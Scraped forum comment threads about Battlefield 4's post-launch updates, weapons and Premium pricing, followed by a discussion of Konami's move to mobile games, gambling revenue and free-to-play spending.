Anyone who played BFBC2 will remember how overpowered this gun was for a while. Superb. That gun was the best, I'm so glad it's returning. Even on BF3. I only ever played HC and the 2 round burst was unstoppable. There was a point in BFBC2 where it was literally the only gun worth using. It only lasted a couple weeks as I remember but it was godlike. Yeah! AN-94 was my go-to assault rifle back then. I never actually realized that it was so overpowered, but man did I get tons of service stars with that gun. It has been brought in line with the balance of BF4 tho. The 2-bullet burst is still 1200rpm (ie. 50ms between bullet 1 and 2 from the burst), but there is a delay between bursts that limits the max rate of continuous burst fire to about ~705rpm. In fullauto it fires at 600rpm. Ah thanks. You're correct  No g53? :[ Nope. The dev who animated the weapons, /u/AnimationMerc, made a post on /r/battlefield_4 explaining the reasons behind choosing the weapons they did.

http://www.reddit.com/r/battlefield_4/comments/312yel/dice_pls_but_i_wanted_a_g3_xm8_ak47_red_ryder/ *Return to Back to Karkand* confirmed?

I really hope so, I could use a sensible chuckle Don't worry you'll sure get the Karkand. Might actually make me get this battlefield What's "Gunmaster"? Is it like Gun Game from CS? yes, this gamemode was also in the BF3 "close quarters" expansion Exactly that. 2 kills per tier, team based on small maps usually. Usually goes Pistols&gt;PDWs&gt;Shotguns&gt;Carbines&gt;Rifles&gt;LMGs&gt;Snipers&gt;Grenade&gt;Knife.

It's actually pretty fun, assists can be infuriating but BF4 has the system where if you do more than 75 points of damage you get the kill credit so it'll be interesting to see how that comes in. There is also the chance of some older "retro" battlefield maps being remade for BF4, but it is unconfirmed. Yeah, that's right. They did a poll a while back, didn't they? But like you said, not confirmed. Come on... give us Wake Island! They will never not give you wake island. I want Valdez Port, Arica Arbor, Harvest Day, Oasis,... I just want good Rush map to be back. I love Conquest in BF4 but Rush was soooo good in Bad Company 2 mostly because the maps were more adapted for this mode. Ahh Arica Harbor... The most well balanced map (for Rush mode) in the entire BF series. Some of those BC2 maps are simply outstanding. If I could, I would have listed all of them. So many good, memorable maps !

BFBC2 was my very first "next gen" game and it holds a special place in my heart. I've met some of my best online friends, spent so many hours playing with the squads, and I pretty much never got bored.

But I feel like they will never do better, or even as good. Everything was simpler back then; less choice in accessories, weapons or perks but somehow... I think I preferred it. The destruction were so much better too. I don't think EA will go back to these "roots" (the BC ones, I mean). The bloated weapon customization is an issue for me. We don't need three different types of suppressors or red dots that do the same damn thing Totally agree. It was the high-water mark of the BF series for sure. BF2 had some great elements to it that they never did again, but BC2 is fantastic. I want Dragon Valley back :&lt; I'd say Dragon Valley is very possible considering that most of BF4 plays out in Asia. Maybe we'll even get the PLA! You know what would be *really* amazing? 

Battlefield: Bad Company 3

I found both the campaign and the multiplayer in BC and BC2 to be very enjoyable and the destructible environments, comedic dialogue, and expansive maps are really what made those two games stand out. If DICE was to add a third game to the series, there's no doubt that I would consider buying it, especially with the success DICE had with BC and BC2.
 Oh man, I wish... But like I said in my other comment, I don't think it can be as good or better than BC2 with how EA/DICE handle the series right now, unless they want to go back to simpler "roots" (which I would love). True, true. You always have to be skeptical with any new addition to a series. See: Battlefront 3 The problem is the good rush maps don't make good conquest ones, and vice versa.  BF3 had a few good rush maps (Damavend Peak as the most notable), but BF4 has absolutely none.   There are maps coming. Revised old BF maps and remade for BF4. I did not see that. Thanks! This is great that the devs they handed it over to have continued to support this game for so long! Very excited to see night maps.  DICE LA really deserves to get to make own game. With BF4 they have shown that they make good design decisions etc. They already did, it was Medal of Honor: Warfighter. They're the remains of Danger Close. But in many ways, with the amount of rework they've done, they've pretty much built everything but the scenery for BF4 in it's current incarnation. I think I'm in the minority that absolutely loved the new Medal of Honor's that came out, especially Warfighter. I loved the multiplayer too, what's everyone's thoughts on those games? I think most people just weren't looking for another gritty modern shooter when Warfighter came out, really. Personally I disliked the graphical choices they made (all the ambient occlusion of Far Cry 3, but without the brilliant art direction), but it didn't influence my decision to not buy it - I just wasn't interested.
The reviews weren't good either, as I recall. I think it was just a bit... unremarkable to most people. I played the first reboot through twice. Great campaign. It definitely had stupid bugs, lots of pop-in and enemies spawning, stupid AI that wouldn't progress... but the immersion I felt and the intensity of some sequences were just awesome. The friendly communications were the most immersive I've ever listened to in a military shooter. Definitely agree, man that sequence in the bottom of the valley when your team is about to get overwhelmed and your radio guy calls command to tell them not to send help because you aren't going to make it...man, seriously had the hairs standing up on the back of my neck. one of my favorite modern military shooter campaigns.  Shame Warfighter's campaign wasn't quite up to snuff. I really enjoyed Warfighter multiplayer, the buddy system thing was actually really fun. Plus, that stadium map was the BEST. They improved on an already good game. Doesn't mean they could make their own game from scratch. &gt;They improved on an already good game.

Uhhh they took a base game that was broken in parts and had some serious design flaws, and made it into a VERY good FPS. Still, the bulk of the work isn't from them. Yes, what they did is commendable,  but lets no get ahead of ourselves.  Yeah, the core of the game was developed in Stockholm. I've said this before, but it makes no sense to just give credit to one of the studios. They're both DICE, and there's a bunch of ex Stockholm devs currently working in LA anyway. What they've done is basically just shifted development of BF4 to where there's resources available to work on it while Stockholm is busy with ME2 and Battlefront. It's basically simple company management at work...  Considering how much they have redesigned in BF4 because design sucked donkeys dick or community wanted it gone, not even mentioning whole performance fixing, shows that they can get shit done. Dude... There is a huge difference between creating and improving, especially in game design. To improve on something is a lot simpler and easier than to create from scratch.  Well DICE LA has devs who made Medal of Honor: Warfighter and some other hires so its not like this is their first rodeo. I quite liked Warfighter for what it's.

They have talent to create from scratch and apparently talent to make better design decisions than Stockholm team. Apparently BF4 got handed to other Dice devs after release and if that's the case, then hats off to them. They've done a great job supporting it and cleaning up the original studio's mess.  Yeah they handed the development to DICE LA. DICE LA is a mix of DICE Stockholm and ex Danger Close (The people who made MoH: Warfighter) employees. They have done an excellent job at keeping the game alive and fixing issues. Which where the first devs? DICE in Stockholm. I know right. BF4 is a ton more fun to play now.

Seriously at launch with my PC I was crashing like crazy and getting 40fps average. Now with the same settings I'm not dropping below 70 and the only issue that exists is with the servers.

So good to see it getting supported. I haven't played Hardline but if you want some BF in your life, I'd recommend BF4 now.

 I am happy to hear this news, I am going to stay optimistic and hope that EA is tired of the hate and truly wants to start changing things with their customers. Still as much as I have enjoyed recent battlefield games I am eagerly hoping for even just a remake of Battlefield 2142. EA just easily shrugs the hate off... 

The "Hate" generated by the community has not significantly impacted their sales or actions in the slightest.  Doubtful.  Rather, I suspect that BF4 is at that point in its lifetime where it is no longer able to push $60 price tag with $50 Premium.  So, they continue support to keep the game fresh while slashing prices to bring in players that didn't buy in earlier.  Its a good strategy but I doubt they've given up on the $110 BF+Premium gravy train.


With the last Premium expansion Final Stand they introduced a bunch of proto-2142 style stuff, so I really hope that's a direction they want to go in with the next Battlefield game.  Hangar 21 even had a prototype Titan being built on A and B of that map.


They could even do a mini-expansion like Bad Company Vietnam, which would own bones. &gt; but I doubt they've given up on the $110 BF+Premium gravy train.

it's not like Premium isn't a good deal, though

&gt; With the last Premium expansion Final Stand they introduced a bunch of proto-2142 style stuff, so I really hope that's a direction they want to go in with the next Battlefield game.

Battlefront is a thing, so i agree i think they're getting ready to usher in more futuristic stuff. i mean Hardline isn't futuristic but i really like it. Premium edition is also on sale right now for $25 with the origin25 discount code at checkout...  Looks like it might be time for me to finally jump in. I havent played in a few months and sucked but the game ran very well with basically no crashing for me. Definitely a good time to hop in especially with this new free content on the way.  How much for premium upgrade? $10? &gt;Premium edition 

Its already included I think they mean that they already own the base game and want to upgrade to premium. I'm interested in this too. I already own Digital Deluxe. So I only want the Premium upgrade itself. It's currently on sale for 26.66 (30% off) and you can use ORIGIN25 promo code to reduce the price to 19.99.  It is now officially worth it.  I'm buying.

Edit: Bought, but so far value is kind of questionable as not many servers seem to run the dlc maps.  Seemed like ALL the maps ran DLC back when I didn't have it. Grr. Is the game worth picking up now?  Not just value wise but in terms of mechanics, have they fixed all the problems? It is, this is the time to get it. The game runs amazingly smooth for how nice it looks. They took care of the problems and then some. In my opinion. Does it still take forever to unlock things?  I played it about a year ago and I felt that I was at a significant disadvantage against players that had better guns, equipment and vehicle abilities; not to mention that they were simply way more skilled than me at the game.  It didn't make for a very fun experience for a noob like me. It can take a while, but there are so many EXP boosts from battle packs and 2XP weekends that it helps a lot.

As well, if you know someone who's good with a particular vehicle, roll with them as a passenger using an engineer class. Getting kills as a gunner, repairing while in-vehicle will earn you easy points for that vehicle. Especially if you get premium... Battlepacks for days Pretty much literally. They last an hour, and I think I have about 400 or so, at least. There are people who have way more than that, too.

For me, that's 16 straight days of experience boosts.
 I got something like 40 battlepacks at once after I got premium a few weeks ago. I didn't really understand battlepacks. I opened a few and got an experience boost, but how does it activate, or does it automatically activate? If it automatically activates I'm utterly boned as I opened all my battlepacks in one go... You can activate them in-game. To do this, when you're in a match hit escape (or equivalent controller button) to go to the Menu. On there should be a button on the bottom right to activate an exp boost. You can choose which one you want, and can only have one active at a time. They last 60 minutes. I just realized I could do this 2 days ago after getting to level 30 or so...I have nearly a dozen of each boost.  

Since then, I've topped out the progress on most of the weapon classes I had spent months working on.   Use the AK-5C Carbine... the all around Gun is an easy XP filler. 

Add a 'Kobra' scope, and 'Muzzle Brake" for the barel and a 'Potato grip" for the underbarrel and you'll be killing easily in no time. I should [probably know.](http://i.imgur.com/hCrI5Zs.jpg) You don't unlock "better" guns - the starter weapons are perfectly on par with others in the game. You are at a disadvantage when it comes to vehicles, though. This is true. By rank 10 you'll have found some guns you excel with. My top weapons aren't the typical 'best' weapons, but I do best with them. (sg552, PKP, Unica etc).

And yeah, trying to unlock anything with the jet when all you have is the jet's cannon and you're flying against veteran pilots loaded to the hilt...that is a steep climb.

Also, if you're new, join a big (32, 48, even 64 player) Team Death Match server because you'll get the most exp that way. I did find it challenging to get some unlocks particularly the flir and other high end scopes. But as you point out its a simple manner of picking favorite guns.  The starter weapons are absolutely amazing. Everything really comes down to preference. Vehicles can be rough though. I just started playing this game about a week ago. The grind is there, but as /u/Avengerr and /u/DeeJayDelicious mentioned using EXP boosters can help. 

After just a week of playing I obviously still have a lot left to unlock, but the EXP boosters have helped me unlock enough that I feel the playing field is now more or less level.

Well more or less level in terms of equipment; my skill at shooting... yeah, that still needs a LOT of work. :) Thanks everyone for the info.  Maybe I'll give it a shot again!   Yeah, that is the downside of the game. They wanted progression, and they put it in, I guess people like it because these types of systems are common. I would rather the game were completely equal in terms of what you can use, but it is a way to get players to want to keep playing the game, and one can argue it makes the game more fun, because you feel like you are being productive with your time.

That said, it is not that bad really, if you put in a little time you get over the hump and can be competitive quite quickly. I came to the game late too but never felt like I was at a huge disadvantage. If you use your boosters on a regular basis it's easy to catch up. A few vehicles are the exception, but on the other hand they are generally quick to unlock. Talent-wise, it takes a bit to learn. Just stick with your team, don't run out in no man's land, and go for the objectives. 

As for unlocking things, not really. They give you so many XP boosts that you pretty much always have one on. Plus, most of the starting weapons are very very good and you'll see even high ranks using them despite unlocking everything else.  Unlocks in BF4 are generally speaking not 'better', except certain jet unlocks (i'd go in a low pop air superiority match for this).  Everyone sucks at BF at the start, and the starter weapons are just as good as the unlocks. I'm considering picking it up as well.. I really enjoyed the BF3 but never got around to picking up 4 because of all the release problems. Is it worth just getting the base package? Or would you suggestion Premium?  I bought it on release and over the past year my opinion went from "I can't believe I bought this busted useless game" to "this is the best online FPS I've ever played" and they keep making regular updates and improvements to it. It's a completely different and way better experience now than it was at launch or even the first 6 months after release.

I'd recommend just going with premium edition since it's only like $20-25 and you get a ton of extra content over the base game. The base game is still great and there's a lot of hours of fun to be had on those maps, but with premium edition being as cheap as it is now, I'd just go with that.
 Appreciate the response! I think I will I don't have Premium and I still manage to have plenty of fun, but if you have the money consider premium. The community is unfortunately split by the expansion and it can be hard to find a good 64player server playing vanilla even in conquest (most popular gamemode) Not worth it for just vanilla IMO.  Premium adds 20 new maps, many of which are heavily played.  Never mind the weapons and vehicles and game modes. You won't find a better time.  The worst of the problems are fixed, Premium is done, free content on the way and it's populated. It's on sale on Origin this weekend.  did they make rush less shitty by improving the number of tickets? even in spite of the performance issues I thought the state rush was in the early life of the game was hot garbage and its my favorite mode =( Not really TBH.  BF4 is still all about Conquest, although carrier assault gets some playtime. A lot of problems were fixed but the game is far from being "competitive". Nonetheless its great fun, on PC and last gen consoles players easily outnumber BF:H. Its almost always on sale.

Edit: by "competitive" I mean completely bug-free. The game still suffers from hit-detection failure, getting shot behind cover, occasional graphic glitches. Certainly its the price to be paid for a 64p MP with "Levolution" and bullet physics. I have &gt;800h of BF4, so I love the game but it isn't perfect.  BF was never about being competitive, nor should it be. Its optimized for 64 players mostly, not for 5vs5. 

Edit to your edit: I thought you meant optimized for e-sport events, nut just bug free. :-) BF will never be competitive like CS:GO is competitive, it's the sacrifice that needs to be made for huge levels, big destruction, and projectile weapons with physics. I LOVE CSGO and competitive games. I love having some hardcore good players on my team and having constant communication and being in the clutch against 5 and pulling through. It's just a rush. 

But sometimes I don't. Sometimes I want to launch a jeep across the map with 300lbs of c4, slam into a helicopter, parachute down, knife some dude, quickly 180 and no scope the admin, tea bag him, and get banned for being too awesome. 

There's a place for competitive and a place for casual and absolute chaos. I'm happy they've been kept separate  Well said. And on EA Access if you're on the Xbox One. Runs at 60 fps, too, to my surprise. Most definitely, it's been fixed and patched to the fullest, and is just a joyful experince now. I can't honestly remember when I last raged at a bug. With the current sale, is it worth getting the digital deluxe or the premium edition or should the standard edition be good enough for someone barley getting into Battlefield? Definitely worth $25 for the whole package. You'll have a lot of fun with it if you like big shooting games. It runs much better then it did at launch from what I've heard, though I didn't have issues with it. 

As the other person said, if you aren't sure try the demo thing Origin does.  If you have friends that all already have premium, get premium. I bought the base version (retail for pc is pretty cheap these days), then premium when it was 50% off. 

if you're unsure you can play for a week via gametime before you spend money. [deleted] [deleted] Does this game still have it's strange performance issues? I played it on Origin Game Time shortly after it came out. It would run at 60fps for about 10-20 seconds, hang for 3, run for 10-20 seconds, hang for 3, rinse and repeat. Completely and utterly unplayable.  It performs signiiiiiiiiiiiiiiiiiificantly better now than any time near release. I played like I had no life for about 100 hours and gave up out of frustration with the performance and uninstalled. Came back a few months ago on the same PC, and it worked great.  Its vastly improved It's a lot better. Night and day difference, really. It still hangs up on occasion, sure, but it's not often. I'm having some crash issues for the past few months, but it runs pretty good, yeah. Not sure if this is a stupid question, but is this patch also included on the console versions?  Sorry for the late reply but yes, the patch will be coming to consoles with the new weapons and Gun Master. As for the maps, I'm almost certain that they will be for the PS4 and the XBox One versions but not for the PS3 or XBox 360 versions (something about hardware limitations) Huh, I just logged into battlelog after not playing since shortly after launch... I thought I had most things for the assault heli unlocked but according to battlelog I don't. I also feel like I'm missing unlocks, weird... did anything happen at any point that would cause that?

2nd question, whats the downside of not buying the expansions? Are the vanilla maps still played enough to find games? I logged back in after a year and all my loadouts were wiped (I still had everything, they were just set to default items) and all items I had were marked as new. As a person that loved BF2, but thought BF3 was kinda ok... well not that great.


Why should I buy or not buy BF4?


And WTF is a "battle pack" Yes, you should buy it. A battle pack is something that gives you a bunch of random stuff, like weapons and other gear. It can be unlocked through playing or paying a little money. I don't see why you'd pay for them, though, you can unlock everything for a class for like $2 but unlocking everything through gameplay is more fun and not that slow. Buying premium alone would drop at least 50 Battlepacks on a new player. Yeah, I get a shitload of battlepacks. Never really had a reason to pay for anything, although the option is definitely there.  heh. for some reason I read, "DICE: all future Battlefield 4 will be content free" to which I thought, "of course it will."

 Wait didn't a new Battlefield game literally just come out?
How come they're still doing DLC for 4? Recently started playing BF4 on pc again, and i'm quite happy with the improvements to the netcode as compared to what it was back at launch. Do they have that terrible web interface for multiplayer like they did for BF3? I'd be interested in buying but I hated having to install browser add ons They do, but honestly it's pretty decent. One plugin then everything works perfectly. Battlelog was shit years ago when BF3 was relatively new. I just picked up BF4 premium and its 100% better. Very fast and no bugs that I've noticed. Huge improvement over the broken server browser in BF2. I was actually banned from DICE's forum for posting a video demonstrating how broken it was. [deleted] Does this mean that non premium members will also get the old DLC packs?  My friend doesn't have premium and it's hard to find a quality game for both of us.  There's no doubt that Konami has a lot more misses than hits in recent years. But it seems the point behind this move is, even when the games *are* good, they are much riskier and often less profitable than mobile gaming.

What really bums me out is that Konami holds the rights to a lot of really cool IP. It would be a shame to see that stuff relegated stricly to mobile gaming. A point is that demand for real elaborate games will be there regardless of whether big publishers cease to make them or not. If Konami starts to make only mobile games,  this demand will be satisfied by someone else eventually  Mobile gaming is like mega blocks is to Legos...

I like playing with mega blocks but deep down I really wish I'd have Legos. Sure, but the intended audience for mega blocks (infants) don't give a shit that they're not playing with lego, and if they really like mega blocks they can get into lego later. I always thought the intended audience for mega blocks was unloved children. or loved children with unknowing parents Yeah, but Konami is going to switch to selling Metal Gear Solid Mega Blocks and what WE want is more Metal Gear Solid Lego (replace MGS with your favorite Konami IP). But we won't get that ever again. Personally, I'm fine with MGSV being the end of Metal Gear Solid. I feel like it's been allowed to run it's course.

Will it be a bummer to see "Puzzle and Metal Gears" on the mobile market? Sure. But it doesn't take anything away from the amazing series of games that is already out there. I agree, the convoluted plot of MGS is something I keep wondering if there's really much further for it to go. 

The underlying gameplay is something that could be reinvented in a new world (The MGS gameplay has been changed/refreshed a bunch over the years already), with a fresh convoluted plot, another hero that takes heavy inspiration from 80's movie stars.

It's not as though Konami have the exclusive rights on "games like MGS", just that specific series, or that Kojima+Konami was the only combination possible to create something like MGS. I love it when there's the opportunity for someone to create something new, something better. Metal Gear is probably a bad example, but Konami also holds many franchises like Silent Hill and Castlevania that could really use some love. I used to get upset about this but I just don't care anymore. Now that the real creators of those IPs are starting their own companies to produce their spiritual successors, I am absolutely thrilled that I get more of what I love without the bad management that has been trying to add mass appeal to them.

I have really high hopes for Iga's new game, and even though the beta apparently isn't that great I'm still excited to try out mighty no. 9. This is a really good point.  At the end of the day, we may just be missing out on the Konami logo. And even if they suck... Who cares at the end of the day? Imagine that megaman died. That's sad and all but as long as the next thing comes to replace it, say Shovel Knight becomes a biyearly series, then I'll be perfectly fine.

What's really sad is when an entire genre rather than a series dies out and nothing replaces it. And not just we didn't need get any help preventing it before (goodbye RTS's), we're actually at a better place to see that fate never happen again at this point (So many indie devs, DAMN). Oh Castlevania will get some love alright. "Would you like to whip your whip? One whip costs 4 Stamina which you get one of every day. Or you could get a deluxe stamina pack for 500 dracucoins!" Be careful what you wish for. Someone might take it literally and put out a Lego Metal Gear game. "Why won't you die?!"

"Nanobricks, son!" I think you're thinking of Duplo, the larger version of Lego made by Lego for younger children.  Megabloks are the knock-off version of Lego, intended for people the same age as Lego, though sometimes an older audience than Lego even, because they get licensing with Halo and Assassin's Creed and Call of Duty, and make Megabloks based on them. I don't think the IP is important. Another studio can make a game with gameplay inspired by Metal Gear but with its own original characters and setting. I think that's a good thing actually.  I think this is a good point. Thanks to devs seeing the success of Inafune kickstarting *Mighty No. 9* (even if it doesn't turn out as good as Mega Man...), we're seeing things like Yuka-Laylee and Bloodstained pop up. Even if the major publishers of years gone by hold the rights to all the old IPs and take them to the grave, all the minds *behind* those IPs are not beholden to them and can find success elsewhere now. This may even help drive them to create *new* amazing IPs. Damm, it is just so sad that exploiting people prone to additction with shitty shovelware has become a financially more viable strategy than making actual games. There's a reason casinos are insanely popular and profitable. No difference here unfortunately... Konami knows this all too well since one of their main branches besides video games are pachinko machines. http://www.konami.co.jp/en/ir/financialinfo/sales.html
Figures in billions of Yen 

 Digital Entertainment - 104.3 [video games] 


 Health and Fitness - 76.5


 Gaming &amp; Systems - 31.6 [slot machines and other gambling] 


 Pachinko - 5.8 ["not gambling" because loopholes]

The graphs on that page show where they may be getting this new mobile-centric approach from. Declining video game revenue, increasing gambling revenue. And I bet F2P games are a damn sight easier and cheaper to make than blockbusters like Metal Gear. 
 Yea moreso than the total yeilds, you need to look at the investment that goes into these sytems. Konami spends a 80 billion yen making games that make 100 billion yen vs slots which cost 1 billion to make and net them 31 billion in revenue. I saw a Konami gym the other day. It was a weird feeling.  &gt;  Pachinko - 5.8 ["not gambling" because loopholes]

I had to [look that up](https://en.wikipedia.org/wiki/Pachinko):

&gt;Gambling for cash is illegal in Japan. Pachinko balls won from games cannot be exchanged directly for money in the parlor. The balls are exchanged for tokens or prizes, which can be exchanged for cash at a place nominally separate from the parlor.

Seems very shady. It's basically the Game Corner from Pokemon. This remind me the time my girlfriend (who is Japanese) when she brought couple of her classmates to Japan during her JR year. 

One American guy won a whole bunch of chocolate (like the swiss gold coin kind) and complained it was very stale. 

My GF remained silent, but wonder

1) What would the American think if he knew that chocolate must have passed hands for YEARS, if not decades. 

2) The guy just ate 15,000 Yen in two bites.  [deleted] &gt;There's a reason casinos ~~are~~ **were** insanely popular and profitable.

Casinos are losing revenue across America (probably because their customer base is either dying off of old age or getting their fix on mobile devices): 

http://www.pressofatlanticcity.com/news/breaking/atlantic-city-casino-revenue-falls-percent-in-april/article_286cc384-f99d-11e4-b48f-63a695f379b6.html

http://www.reviewjournal.com/business/casinos-gaming/nevada-s-largest-casinos-lose-7437-million-fiscal-14

http://www.bloomberg.com/bw/articles/2014-04-03/casinos-close-as-revenue-falls-in-gambling-saturated-u-dot-s

http://www.bizjournals.com/baltimore/news/2015/05/05/maryland-casinos-raked-in-89-million-in-april.html &gt;probably because their customer base is either dying off of old age or getting their fix on mobile devices

Nah.  The American Gaming Organization [shows](http://www.americangaming.org/industry-resources/research/fact-sheets/gaming-revenue-10-year-trends) overall casino revenues rising year-over-year, peaking in 2007, taking a moderate dip in the recession, and then hitting 2007 levels again in 2012, which is the most recent year they have figures up for.

The problem for casinos isn't that people aren't gambling, it's that there are simply too many casinos in too many states now.  Back when Atlantic City and Las Vegas were the only major gambling destinations, casinos made an absolute fortune.

These days, though, casinos are everywhere, and they're competing each other into insolvency.  If you want an article on the subject, it's the topic of your own Bloomberg link. This is what I thought too.  Where I'm from, you used to have to travel to Reno or Vegas for the big casinos.  Now there are more casinos that keep popping up or expanding all the time, there is not as much reason to travel to Nevada if all you want to do is go to a big casino. People are desperately trying to get them into our state to get us in on the action, but there are casinos literally within an hour or two drive depending on where you live.  And I live in the southeast, ffs. And they lost a lot of ground to Macau which they are now gaining back as China tightens regulations there. Which is a great analogy for what will happen in the mobile game market too. There's no way this current model is sustainable, especially as large companies like Konami start getting into it. Sustainable for whom? The most qualified developers will make room by pushing out others. Konami knows mobile gaming is profitable at the moment. Development time is short and there are no expensive physical copies to ship to retailers which makes it a low risk investment. In the video game crash of 1983, the market was over saturated with low quality games so consumers stopped buying them. The mobile market has always been over saturated with low quality games so I don't think this cash cow will end any time soon. Yup. Atlantic City is struggling now because of all of the casinos out in the Poconos, that are cheaper to stay at and easier (less travel) for some people to get to.  The Pocono casino's are only a part of the picture. Bethlehem, Philadelphia, Bensalem all have very, very busy casinos and are stupidly convenient. More like Atlantic City is struggling because it has little to offer other than the casinos.. no sports betting is a big one, charging $300 a night on the weekends to stay which is insane and more than some Vegas casinos, boardwalk is lackluster compared to Wildwood and Ocean City, etc...  Yeah, but that's in America. Asia casinos are doing really well. Macau is insane. Funny thing is that I assume Konami has a pretty good idea on how to exploit people prone to addiction... considering how well their [casino games business has gone](https://www.gaming.konami.com/home.aspx). You hit the nail on the head. It is an addiction, like gambling with no payout. [South Park did a really good explanation of this concept](https://www.youtube.com/watch?v=5CbWr0zO7Ac)  This problem is also covered quite well in this long but important article: [Chasing the Whale: Examining the ethics of free-to-play games](http://www.gamasutra.com/view/feature/195806/chasing_the_whale_examining_the_.php) Not defending the practice by any means, but there have been some great studies that show that "whales" (i.e people who spend a lot of money on one specific game) often have a much better understanding of their situation that other players. People who are willing to spend 1000s on a single game typically:

1) Have a lot of disposable income

2) Understand that it's just a game, understand that the systems encourage spending

and 3) Are happy spending money on something they actively enjoy.

The exploitative bit isn't typically the whales, it's the people who don't have that much disposable income who are tricked into spending money only to not even get anything out of it.

Another thing to consider is that free-to-play as a model is not inherently bad, it's just often poorly implemented. My favourite current example of free-to-play monetization in the mobile market is [Crossy Road](http://www.crossyroad.com/), a fantastic little game with a great money-making model. 

[ed] Added link to the thing I read last year on request: ["Free-to-play whales more rational than assumed"](http://www.gamesindustry.biz/articles/2014-04-01-free-to-play-whales-more-rational-than-assumed). There is also a lot of research into gamblers that produce similar results, don't have time to provide further sources sorry. Do you have a link to these studies? My problem is many of these games are designed to be addicting rather than fun. So many of them look like poker machines interfaces He's suggesting the studies on gambling I believe. The gambling whales are more aware and okay with the purchases than the exploited dollar lottery tickets tax-on-poor kind of gamblers. The whales also are that which the casinos (and gaming companies) desire. Only thing I could google on it suggested 2% of gamblers make up 25% of the winning (and more importantly losing) at casinos, but the biggest spending subset of that has higher income and consumer happiness than other groups carrying debt or otherwise not able to incur the losses. Actually, this is the thing I read last year. It's a specific gaming study: http://www.gamesindustry.biz/articles/2014-04-01-free-to-play-whales-more-rational-than-assumed I would be a lot more open to the content of that study if it weren't done by someone in the industry. I'd love to see some independent research on the topic  As someone that used to be a whale in f2p mmo, we know what we're doing, I regret it, but it was disposable income I would've wasted elsewhere.


source: $7000 down the drain for a mane I quit after I perfected my gears I don't doubt people like your existence. I want to know what % you make up.  Yeah, while I'm sure there are some people out there who are behind on the car payments because they can't stop buying coins or whatever in Game of War, I think the issue is overblown. 

I know people who spend tens of thousands of dollars on all sorts of hobbies, ranging from fixing up old cars to buying dozens of expensive camera lenses. Hobbies are intensely personal, and who am I to tell someone that they're wrong to be into whatever it is they prefer to spend their time and money on?

I've got hundreds of games in my Steam account that I'll never have time to play, and thousands of dollars worth of woodworking tools in my garage that I rarely have time to use. I'm sure both of those sound dumb as hell to some people, but I personally am glad I have them, enjoyed collecting them, and will likely continue to spend money on more of them. Because it makes me happy and I can afford it.  The point is that when you look at these game's revenue you see that the whales account for some large percentage (40-60%) which means the games MUST have been designed with the intent of finding and exploiting a few mass spenders. Most businesses work this way. A small subset of your customers generate a large, disproportionate share of your revenue.

It's often presented as the 80/20 rule. 80% of your revenue comes from 20% of your customers. Yep, a friend of mine has been *very* into Clash of Clans for probably a year now. Growing up, he was someone that would spend money on a bunch of different games which obviously adds up. Fast forward to today, he has a job, social life, all the things we get once we become adults, etc. etc., and he doesn't really have the time or desire to put into traditional games. As he puts it, he doesn't spend all that money on a bunch of different games anymore and instead he splurges on CoC once and a while. [deleted] The tragedy in all this is that it works on those who did not grow up with gaming as we defined it. In my heyday of gaming I had Half-Life (and mods), Starcraft, C&amp;C, Unreal, Quake, Goldeneye (and PD), and a fuckton of other amazing games.  I don't think I played them as much as my family members who play Clash of Clans. Makes you wonder what today's "heyday" library is going to be. If you can even still access it 20 years from now. Will people even want to?  I'm guilty of enjoying the occasional F2P, but in my view these games are completely disposable.  One goes down, and it's replaced by multiple games so painfully similar that it doesn't matter. I don't think it will exist. Most of these games are a glorified skinner box. They rely on addictive operant conditioning to retain the attention of their users.

The perceived value of the games comes from the social aspect of competing against other people, and achieving new shiny rewards.

No one will play a specific free to play game forever so eventually the playerbase will dry up and the rewards will lose their luster as people move on. The 'magic' that made it enjoyable for people will be gone and even if the required servers are still up and running, they'll be no one to come back to them and play with. For people growing up on mobile games I'm guessing most will just remember the most iconic games. 

Like someone might not find Clash of Clans fun but if they've played it a ton, their friends play it a ton, they're seeing merchandise everywhere and seeing adverts on TV they're much more likely to remember it.
 It's also not true. Star Citizen has raised over $82 million and counting because they went the exact opposite route. People are still willing to pay for new, unique, quality gaming experiences. But those things take risk and imagination. 

Konami is just chasing the quick buck. You can pay kids right out of school pennies to make dozens of mobile games, and do a shotgun approach. Eventually one or two of them will be successful enough to start adding features and monetize, and the failures were so cheap to make as not to matter.
 To be fair, it's still way too early to rule out directly funding games as a passing fad as well. All it will take is one or two high profile crowdfunded games to fail for people to get really stingy. And we don't yet know if Star Citizen is truly worth $82 million. Absolutely. But the _promise_ of the game is what got them the money, so my point was really more that people will come out in droves for a product that they perceive as high quality. 
 The comment you're replying to is about *making actual games*. It's a bit early to know if Star Citizen falls into that category.

They didn't earn $82 million selling an awesome software product. They got $82 million selling promises and dreams that have yet to be fulfilled. Well I can tell you that what's been released so far is very good, but you're just repeating what I already said. They made the money by promising something with quality and depth. The point is that people are looking for quality games more than ever, and backing the desire with their wallets.
 Alright, can I just take a minute to say how brilliant of a term "Shovelware" is? It's just so...perfect. Everything about the word fits its meaning perfectly. A word hasn't been invented that works as well since "Brick". Can you imagine a brick being called anything else? No. It's just the best possible word for the thing, and "Shovelware" is equal to it. It's the god damn peak of wordmaking. 

That is all. I'd imagine if bricks were named differently houses would collapse on the spot. You mean you aren't looking forward to Metal Gear Solid: Match 3 and Silent Hill: Find the Hidden Objects? I saw an ad in the goddamn movie theater the other day for one of these insufferable paint-by-numbers pocket Skinner boxes.

How do you get to that point with a title that clearly passed through Google Translate?

GAME OF ~~THRONES~~ WAR! Ugh.

That said, I've been enjoying the heck out of Galaxy Trucker for Android lately. It's obviously possible to make great mobile games, so I'll keep my fingers crossed... But they're clearly angling for IAP here, and there be dragons. But there's boobs dude! even though there are no tits in the actual game! Something like 50% of alcohol sales are bought by people who drink the equivalent of 10 beers a day. 

In other words, 

1/2 of budweiser's revenue is from people who consume more than two bottles of wine,  each, at dinner. Or almost an entire pint of whiskey.  The problem is it isn't.  Unless you hit on the right game that has the right addiction level ("higher than crack", or the "WOW" factor if you want.) you're not going to make ass tons of money. puzzles and dragons gets a lot of money because it has good gameplay, good balance, and a depth.  Final Fantasy Record Keeper might make a lot of money because of characters, but it doesn't have a staying power.  Heroes Charge has very little interactivity. 

A lot of games are like Final Fantasy Record Keeper and Heroes Charge, they're low activity games. Most people will get bored of them quickly.  Konami is going to get screwed unless they build a solid game behind their mobile marketting (And most comapnies are not willing to do that) Uh. I'm no expert in the industry, but unless my memory is very much mistaken, making a shitty-pay-to-win-game and getting as much money as possible before abandoning it IS a very financially viable strategy. 

